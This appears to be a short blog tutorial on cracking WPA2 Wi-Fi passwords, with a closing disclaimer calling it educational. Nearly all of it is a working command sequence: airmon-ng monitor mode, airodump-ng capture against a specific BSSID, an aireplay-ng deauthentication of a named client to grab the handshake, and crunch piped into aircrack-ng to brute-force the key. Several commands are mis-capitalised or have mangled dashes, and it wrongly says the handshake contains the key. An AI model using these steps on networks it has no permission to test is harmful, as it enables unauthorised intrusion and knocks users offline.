Wi-Fi Password Cracking — WPA2

UMESHA ELLEWALA
3 min readOct 1, 2021

This is referred to as a Brute Force Attack, Dictionary Attack, or Word List Attack. In all three cases, a hacker attempts a large number of password combinations on your Wi-Fi network, and your Wi-Fi password is broken if it matches. Additionally, you may refer to this method as password guessing.

Step 01. Check whether your Network adaptor is connected and you can see wireless interface

iwconfig

Step 02. Enable Monitoring mode for your wireless interface

Airmon-ng start wlan0

Now your interface is Monitoring mode enabled in “wlan0mon”

Step 03. Get the BSSID and the channel of your wireless Access Point (AP) for packet capturing. You can give the ESSID of your AP if you know it (in my case ESSID will be “Remote32pyar”)

Airodump-ng wlan0mon –essid Remote32pyar

Now you got your AP’s BSSID (in the BSSID column) and the AP’s broadcasting channel (n the CH column)

Step 04. Now start capturing packets from your AP

Airodump-ng wlan0mon -c 3 -b 00:1D:C9:07:C9:3C -w /root/Desktop/remote32

Step 05. To generate IVs deauthenticate the client connected to the AP

Aireplay-ng — deauth 0 -c D0:C5:F3:05:3F:48 -a 00:1D:C9:07:C9:3C wlan0mon

Step 06. Once you deauth clients, you can capture Handshake which include WPA2 key

Step 07. You can crack the WPA2 password either by brute forcing or dictionary attacks To Brute force you can use crunch tool

Crunch 10 10 1234567890 | Aircrack-ng -w — 00:BE:3B:85:89:C0.cap

We now understand how to break any Wi-Fi password using brute-force and word list attacks.

DISCLAIMER : This is intended only to educate people about how hackers crack passwords, and how important the strength of the password is, when coming to security.

--

--